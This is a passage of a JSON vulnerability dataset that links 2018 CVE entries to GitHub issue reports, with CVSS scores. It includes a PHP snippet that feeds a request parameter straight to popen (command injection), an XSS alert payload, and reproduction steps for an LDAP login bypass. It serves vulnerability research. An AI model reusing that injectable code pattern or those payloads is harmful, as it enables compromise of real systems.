  27010. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27011. "severity": "HIGH",
  27012. "baseScore": 8.8,
  27013. "impactScore": 5.9,
  27014. "exploitabilityScore": 2.8
  27015. },
  27016. {
  27017. "CVE_ID": "CVE-2018-18317",
  27018. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/6",
  27019. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/6",
  27020. "Repo_new": "yanchongchong/swallow",
  27021. "Issue_Created_At": "2018-10-12T08:17:51Z",
  27022. "description": "dscms_csrf. CODETAG",
  27023. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27024. "severity": "HIGH",
  27025. "baseScore": 8.8,
  27026. "impactScore": 5.9,
  27027. "exploitabilityScore": 2.8
  27028. },
  27029. {
  27030. "CVE_ID": "CVE-2018-18320",
  27031. "Issue_Url_old": "https://github.com/qoli/Merlin.PHP/issues/26",
  27032. "Issue_Url_new": "https://github.com/qoli/merlin.php/issues/26",
  27033. "Repo_new": "qoli/merlin.php",
  27034. "Issue_Created_At": "2018-10-11T08:58:17Z",
  27035. "description": "\u5b89\u5168\u95ee\u9898 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. APITAG popen\u51fd\u6570\u5bfc\u81f4\u547d\u4ee4\u6267\u884c\u3002 $c = _GET('command', 'unknow'); $handle = popen($c, \"r\"); \u6f0f\u6d1e\u8be6\u60c5\u8bf7\u53c2\u8003\uff1a URLTAG poc\uff1a APITAG",
  27036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27037. "severity": "CRITICAL",
  27038. "baseScore": 9.8,
  27039. "impactScore": 5.9,
  27040. "exploitabilityScore": 3.9
  27041. },
  27042. {
  27043. "CVE_ID": "CVE-2018-18361",
  27044. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/10",
  27045. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/10",
  27046. "Repo_new": "gnat/nc-cms",
  27047. "Issue_Created_At": "2018-10-15T08:48:57Z",
  27048. "description": "nc cms Cross Site Scripting . Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can Input any evil js you want URLTAG FILETAG",
  27049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27050. "severity": "MEDIUM",
  27051. "baseScore": 6.1,
  27052. "impactScore": 2.7,
  27053. "exploitabilityScore": 2.8
  27054. },
  27055. {
  27056. "CVE_ID": "CVE-2018-18385",
  27057. "Issue_Url_old": "https://github.com/asciidoctor/asciidoctor/issues/2888",
  27058. "Issue_Url_new": "https://github.com/asciidoctor/asciidoctor/issues/2888",
  27059. "Repo_new": "asciidoctor/asciidoctor",
  27060. "Issue_Created_At": "2018-09-26T08:51:58Z",
  27061. "description": "Infinite loop in Parser next_block. This is another bug found with the fuzzer. With specific input it's possible to cause an inifinite loop in the APITAG method when parsing an asciidoctor file, due to a never breaking while true statement. I think this bug should be prioritized since it can cause a denial of service in programs that rely on asciidoctor. Specifically APITAG is safe since it uses aggressive timeouts in its markup process, although I did later get a NUMBERTAG error on the APITAG main page for a few hours that I've never seen before. I can't tell if it's related or not. Example input APITAG And also APITAG Explanation In the APITAG method there is a while true statement that is used for flow control, and meant to execute only once according to its documentation. I provide no PR since I am not sure what is missing from the loop logic. Plus, I personally think it would be good practice to rewrite this and eliminate the use of an infinite loop especially since it is only used for flow control.",
  27062. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27063. "severity": "HIGH",
  27064. "baseScore": 7.5,
  27065. "impactScore": 3.6,
  27066. "exploitabilityScore": 3.9
  27067. },
  27068. {
  27069. "CVE_ID": "CVE-2018-18389",
  27070. "Issue_Url_old": "https://github.com/neo4j/neo4j/issues/12047",
  27071. "Issue_Url_new": "https://github.com/neo4j/neo4j/issues/12047",
  27072. "Repo_new": "neo4j/neo4j",
  27073. "Issue_Created_At": "2018-10-05T15:19:31Z",
  27074. "description": "Using STARTTLS breaks LDAP authentication. Abstract I discovered that when I configure the LDAP Auth Provider to use STARTTLS authentication is broken, i.e. I can log into the Neo4j instance with any existing user account using arbitrary passwords. Unencrypted LDAP connections (without STARTTLS) and LDAPS connections are not affected. Neo4j version NUMBERTAG enterprise (also reproduced with NUMBERTAG enterprise) Operating system: Alpine (via Docker) APITAG ? Steps to reproduce NUMBERTAG Create APITAG : yaml version NUMBERTAG services: openldap: image: osixia/openldap NUMBERTAG ports NUMBERTAG environment: LDAP_BASE_DN= LDAP_READONLY_USER=true APITAG APITAG LDAP_TLS_VERIFY_CLIENT=try APITAG APITAG APITAG volumes: PATHTAG PATHTAG command: copy service neo4j: image: neo4j NUMBERTAG enterprise ports NUMBERTAG environment: APITAG volumes: PATHTAG PATHTAG PATHTAG NUMBERTAG Pull Docker images: APITAG NUMBERTAG Create APITAG : ERRORTAG NUMBERTAG Create certificates and truststore CODETAG NUMBERTAG Create APITAG : CODETAG NUMBERTAG Create logs directory: mkdir logs NUMBERTAG APITAG NUMBERTAG erify STARTTLS works and account alice exists: APITAG Corresponding LDAP log: ERRORTAG NUMBERTAG Open Neo4J in your browser at APITAG and login using the account alice and the password bob Expected behavior Login fails with error message ERRORTAG Actual behavior Login succeeds.",
  27075. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27076. "severity": "CRITICAL",
  27077. "baseScore": 9.8,
  27078. "impactScore": 5.9,
  27079. "exploitabilityScore": 3.9
  27080. },
  27081. {
  27082. "CVE_ID": "CVE-2018-18407",
  27083. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/488",
  27084. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/488",
  27085. "Repo_new": "appneta/tcpreplay",
  27086. "Issue_Created_At": "2018-10-15T15:58:43Z",
  27087. "description": "Heap overflow in APITAG A heap based buffer overflow was discovered in tcpreplay edit binary, during the incremental checksum operation. The issue is being triggered in the function APITAG at APITAG , invoked by APITAG in APITAG . Tested version NUMBERTAG Command: tcpreplay edit portmap NUMBERTAG seed NUMBERTAG APITAG intf1=eno1 intf2=eno3 decode=some preload pcap verbose $POC Debugging: ERRORTAG ERRORTAG ASAN Report ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  27088. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27089. "severity": "MEDIUM",
  27090. "baseScore": 5.5,
  27091. "impactScore": 3.6,
  27092. "exploitabilityScore": 1.8
  27093. },
  27094. {
  27095. "CVE_ID": "CVE-2018-18408",
  27096. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/489",
  27097. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/489",
  27098. "Repo_new": "appneta/tcpreplay",
  27099. "Issue_Created_At": "2018-10-15T16:32:35Z",
  27100. "description": "Use after free in APITAG . A heap use after free issue exists in tcpbridge binary of tcpreplay, being triggered in function APITAG at file APITAG . Tested version NUMBERTAG Command: tcpbridge intf1=en7 Debugging ERRORTAG APITAG ASAN Report ERRORTAG No reproducer file required.",
  27101. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27102. "severity": "CRITICAL",
  27103. "baseScore": 9.8,
  27104. "impactScore": 5.9,
  27105. "exploitabilityScore": 3.9
  27106. },
  27107. {
  27108. "CVE_ID": "CVE-2018-18422",
  27109. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/8",
  27110. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/8",
  27111. "Repo_new": "yanchongchong/swallow",
  27112. "Issue_Created_At": "2018-10-16T06:54:47Z",
  27113. "description": "APITAG CODETAG",
  27114. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27115. "severity": "HIGH",
  27116. "baseScore": 8.8,
  27117. "impactScore": 5.9,
  27118. "exploitabilityScore": 2.8
  27119. },
  27120. {
  27121. "CVE_ID": "CVE-2018-18434",
  27122. "Issue_Url_old": "https://github.com/linlinjava/litemall/issues/76",
  27123. "Issue_Url_new": "https://github.com/linlinjava/litemall/issues/76",
  27124. "Repo_new": "linlinjava/litemall",
  27125. "Issue_Created_At": "2018-10-12T07:37:33Z",
  27126. "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. \u60a8\u597d: APITAG APITAG FILETAG APITAG",
  27127. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  27128. "severity": "HIGH",
  27129. "baseScore": 7.5,
  27130. "impactScore": 3.6,
  27131. "exploitabilityScore": 3.9
  27132. },
  27133. {
  27134. "CVE_ID": "CVE-2018-18443",
  27135. "Issue_Url_old": "https://github.com/openexr/openexr/issues/350",
  27136. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/350",
  27137. "Repo_new": "academysoftwarefoundation/openexr",
  27138. "Issue_Created_At": "2018-10-17T12:48:54Z",
  27139. "description": "heap buffer overflow. Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
  27140. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  27141. "severity": "MEDIUM",
  27142. "baseScore": 4.3,
  27143. "impactScore": 1.4,
  27144. "exploitabilityScore": 2.8
  27145. },
  27146. {
  27147. "CVE_ID": "CVE-2018-18444",
  27148. "Issue_Url_old": "https://github.com/openexr/openexr/issues/351",
  27149. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/351",
  27150. "Repo_new": "academysoftwarefoundation/openexr",
  27151. "Issue_Created_At": "2018-10-17T12:59:22Z",
  27152. "description": "Out of Memory . Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG exrmultiview left PATHTAG right APITAG NUMBERTAG exr exrmultiview: APITAG _int_malloc: Assertion `(unsigned long) (size) >= (unsigned long) (nb)' failed. Aborted root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
  27153. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27154. "severity": "HIGH",
  27155. "baseScore": 8.8,
  27156. "impactScore": 5.9,
  27157. "exploitabilityScore": 2.8
  27158. },
  27159. {
  27160. "CVE_ID": "CVE-2018-18478",
  27161. "Issue_Url_old": "https://github.com/librenms/librenms/issues/9170",
  27162. "Issue_Url_new": "https://github.com/librenms/librenms/issues/9170",
  27163. "Repo_new": "librenms/librenms",
  27164. "Issue_Created_At": "2018-09-07T23:45:41Z",
  27165. "description": "[SECURITY] Persistent Cross Site Scripting (XSS). Hi, dashboard_name parameter is vulnerable to Persistent Cross Site Scripting attacks through POST requests in FILETAG resource. This vulnerability, allow remote attackers to inject arbitrary web script or HTML. Proof of concept APITAG Click in New Dashboard (+) and enter payload \" APITAG alert('XSS APITAG APITAG \" in name field Greetings!",
  27166. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27167. "severity": "MEDIUM",
  27168. "baseScore": 6.1,
  27169. "impactScore": 2.7,
  27170. "exploitabilityScore": 2.8
  27171. },
  27172. {
  27173. "CVE_ID": "CVE-2018-18482",
  27174. "Issue_Url_old": "https://github.com/lfittl/libpg_query/issues/49",
  27175. "Issue_Url_new": "https://github.com/pganalyze/libpg_query/issues/49",
  27176. "Repo_new": "pganalyze/libpg_query",
  27177. "Issue_Created_At": "2018-09-28T06:46:14Z",
  27178. "description": "Memory leak in APITAG Hi, I compiled the 'parse_plpgsql.c' and tested it with file APITAG APITAG and valgrind find memory leak in APITAG ERRORTAG ERRORTAG After debugging by gdb, I found it seems APITAG doesn't free correctly when parse APITAG function APITAG doesn't be called.)",
  27179. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27180. "severity": "MEDIUM",
  27181. "baseScore": 6.5,
  27182. "impactScore": 3.6,
  27183. "exploitabilityScore": 2.8
  27184. },
  27185. {
  27186. "CVE_ID": "CVE-2018-18531",
  27187. "Issue_Url_old": "https://github.com/penggle/kaptcha/issues/3",
